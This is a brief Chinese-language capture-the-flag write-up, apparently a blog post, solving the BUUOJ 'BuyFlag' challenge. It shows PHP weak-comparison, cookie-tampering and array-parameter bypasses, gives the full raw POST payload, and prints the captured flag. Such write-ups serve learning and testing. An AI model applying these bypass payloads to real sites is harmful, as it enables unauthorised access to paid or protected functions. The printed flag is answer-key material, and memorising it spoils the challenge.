[极客大挑战 2019]BuyFlag 1
打开实例发现pay.php页面,有提示信息
打开源码发现password post提交逻辑
burpsuite抓包传参,传入money和password参数,这里password是==弱比较,所以加个字符就可以绕过
password=404a&money=100000000
回显发现并没有变化
注意到学生需要CUIT(Only Cuit's students can buy the FLAG)
尝试修改头信息,将cookie验证修改为1(0 false,1 ture)
成功绕过身份验证(我这边bp不知道为啥一直提示password传不过去),所以我换了hacker bar提交;这边显示密码正确,身份验证也对了,但是money错误,怀疑是长度问题。(you have not enough money,loser~)
采用数组绕过,成功获得flag
password=404a&money[]=100000000
flag{46a2d632-843d-41bf-9a8a-42aac15baf18}
最终payload
POST /pay.php HTTP/1.1
Host: 8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81
Connection: keep-alive
Referer: http://8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81/pay.php
Cookie: user=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i
password=404a&money[]=100000000
标签:极客,zh,money,buuoj,BuyFlag,2019,password
From: https://www.cnblogs.com/tazmi/p/18535677